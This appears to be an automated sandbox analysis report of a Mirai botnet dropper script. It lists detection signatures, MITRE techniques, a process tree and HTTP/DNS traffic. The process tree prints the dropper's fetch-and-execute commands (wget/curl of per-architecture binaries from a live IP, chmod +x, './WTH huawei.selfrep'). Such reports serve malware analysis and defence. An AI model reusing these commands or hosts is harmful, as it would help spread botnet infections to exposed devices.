mirai | bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b

Analysis

max time kernel
144s
max time network
150s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
12/03/2025, 03:20 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
Size

2KB
MD5

8d6ef05d1948cecba422e0f81c304cd0
SHA1

c596c34265e6be88262c26a8acdf85a15718c163
SHA256

bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b
SHA512

a32f2820f0a047e990a1a96e14f00cc60a1051851944c77dc66db069beb22ed1846efdbee2540394f53e49576c897d99f02a8b5aa36b54857b02638ee49ffb2e

Score

10^/10

mirai unstable botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
751	chmod
760	chmod
805	chmod
823	chmod
837	chmod
877	chmod
781	chmod
829	chmod
861	chmod
882	chmod
888	chmod
734	chmod
744	chmod

Deletes itself 1 IoCs

pid	Process
745	WTH

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/WTH	736	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	745	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	752	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	761	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	783	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	807	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	824	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	830	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	839	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	862	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	878	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	883	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/WTH	889	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTH
File opened for modification	/dev/misc/watchdog	WTH

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTH
File opened for modification	/bin/watchdog	WTH

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-4.dat	upx
behavioral3/files/fstream-5.dat	upx
behavioral3/files/fstream-6.dat	upx
behavioral3/files/fstream-7.dat	upx

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	4hn6dpbgwbkwiaii	745	WTH

Reads runtime system information 15 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/maps	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
739	wget
742	curl
743	cat

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/EdiAf.arm5	curl
File opened for modification	/tmp/EdiAf.arm6	wget
File opened for modification	/tmp/EdiAf.arm6	curl
File opened for modification	/tmp/EdiAf.ppc	wget
File opened for modification	/tmp/EdiAf.m68k	wget
File opened for modification	/tmp/EdiAf.m68k	curl
File opened for modification	/tmp/EdiAf.sh4	wget
File opened for modification	/tmp/EdiAf.arc	curl
File opened for modification	/tmp/EdiAf.arm7	wget
File opened for modification	/tmp/EdiAf.arm7	curl
File opened for modification	/tmp/EdiAf.spc	curl
File opened for modification	/tmp/EdiAf.i686	curl
File opened for modification	/tmp/EdiAf.x86	wget
File opened for modification	/tmp/EdiAf.mpsl	wget
File opened for modification	/tmp/EdiAf.arm	wget
File opened for modification	/tmp/EdiAf.ppc	curl
File opened for modification	/tmp/EdiAf.sh4	curl
File opened for modification	/tmp/EdiAf.x86	curl
File opened for modification	/tmp/WTH	bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
File opened for modification	/tmp/EdiAf.mips	wget
File opened for modification	/tmp/EdiAf.mips	curl
File opened for modification	/tmp/EdiAf.mpsl	curl
File opened for modification	/tmp/EdiAf.arm	curl
File opened for modification	/tmp/EdiAf.arm5	wget
File opened for modification	/tmp/EdiAf.spc	wget

/tmp/bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
/tmp/bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:706
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.x86
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:721
- /bin/cat
  cat EdiAf.x86
  2⤵
  PID:733
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.x86 systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-o81YHF WTH
  2⤵
  - File and Directory Permissions Modification
  PID:734
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:736
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:739
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  PID:743
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.mips EdiAf.x86 systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-o81YHF WTH
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  - Deletes itself
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  - Reads runtime system information
  PID:745
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Writes file to tmp directory
  PID:748
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/cat
  cat EdiAf.mpsl
  2⤵
  PID:750
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-o81YHF WTH
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:752
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm
  2⤵
  - Writes file to tmp directory
  PID:754
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/cat
  cat EdiAf.arm
  2⤵
  PID:759
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:761
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm5
  2⤵
  - Writes file to tmp directory
  PID:763
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:771
- /bin/cat
  cat EdiAf.arm5
  2⤵
  PID:780
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:783
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm6
  2⤵
  - Writes file to tmp directory
  PID:785
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:793
- /bin/cat
  cat EdiAf.arm6
  2⤵
  PID:804
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:807
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm7
  2⤵
  - Writes file to tmp directory
  PID:812
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/cat
  cat EdiAf.arm7
  2⤵
  PID:822
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:824
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.ppc
  2⤵
  - Writes file to tmp directory
  PID:826
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/cat
  cat EdiAf.ppc
  2⤵
  PID:828
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:830
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.m68k
  2⤵
  - Writes file to tmp directory
  PID:832
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/cat
  cat EdiAf.m68k
  2⤵
  PID:836
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:837
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:839
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.spc
  2⤵
  - Writes file to tmp directory
  PID:842
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849
- /bin/cat
  cat EdiAf.spc
  2⤵
  PID:860
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:862
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.i686
  2⤵
  PID:866
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/cat
  cat EdiAf.i686
  2⤵
  PID:876
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:878
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.sh4
  2⤵
  - Writes file to tmp directory
  PID:879
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:880
- /bin/cat
  cat EdiAf.sh4
  2⤵
  PID:881
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:883
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arc
  2⤵
  PID:885
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:886
- /bin/cat
  cat EdiAf.arc
  2⤵
  PID:887
- /bin/chmod
  chmod +x bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/WTH
  ./WTH huawei.selfrep
  2⤵
  PID:889

Network

GET

http://78.40.117.13/EdiAf.x86

Remote address:

78.40.117.13:80

Request

GET /EdiAf.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.x86

Remote address:

78.40.117.13:80

Request

GET /EdiAf.x86 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:06 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
GET

http://78.40.117.13/EdiAf.mips

Remote address:

78.40.117.13:80

Request

GET /EdiAf.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:08 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.mips

Remote address:

78.40.117.13:80

Request

GET /EdiAf.mips HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:14 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
DNS

dasdv1.service1921.club

Remote address:

8.8.8.8:53

Request

dasdv1.service1921.club

IN A

Response

dasdv1.service1921.club

IN A

78.40.117.13
GET

http://78.40.117.13/EdiAf.mpsl

Remote address:

78.40.117.13:80

Request

GET /EdiAf.mpsl HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:17 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.mpsl

Remote address:

78.40.117.13:80

Request

GET /EdiAf.mpsl HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:23 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
GET

http://78.40.117.13/EdiAf.arm

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.arm

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
GET

http://78.40.117.13/EdiAf.arm5

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.arm5

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm5 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:39 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
GET

http://78.40.117.13/EdiAf.arm6

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:41 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.arm6

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm6 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
GET

http://78.40.117.13/EdiAf.arm7

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.arm7

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arm7 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:52 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
GET

http://78.40.117.13/EdiAf.ppc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:21:56 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.ppc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.ppc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:02 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
GET

http://78.40.117.13/EdiAf.m68k

Remote address:

78.40.117.13:80

Request

GET /EdiAf.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.m68k

Remote address:

78.40.117.13:80

Request

GET /EdiAf.m68k HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:11 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
GET

http://78.40.117.13/EdiAf.spc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.spc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:14 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.spc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.spc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
GET

http://78.40.117.13/EdiAf.i686

Remote address:

78.40.117.13:80

Request

GET /EdiAf.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Wed, 12 Mar 2025 03:22:21 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://78.40.117.13/EdiAf.i686

Remote address:

78.40.117.13:80

Request

GET /EdiAf.i686 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Wed, 12 Mar 2025 03:22:24 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
GET

http://78.40.117.13/EdiAf.sh4

Remote address:

78.40.117.13:80

Request

GET /EdiAf.sh4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://78.40.117.13/EdiAf.sh4

Remote address:

78.40.117.13:80

Request

GET /EdiAf.sh4 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 03:22:28 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
GET

http://78.40.117.13/EdiAf.arc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Wed, 12 Mar 2025 03:22:30 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://78.40.117.13/EdiAf.arc

Remote address:

78.40.117.13:80

Request

GET /EdiAf.arc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Wed, 12 Mar 2025 03:22:31 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Content-Type: text/html; charset=iso-8859-1

78.40.117.13:80

http://78.40.117.13/EdiAf.x86

http

622 B
33.0kB
9
27

HTTP Request

GET http://78.40.117.13/EdiAf.x86

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.x86

http

665 B
32.9kB
11
27

HTTP Request

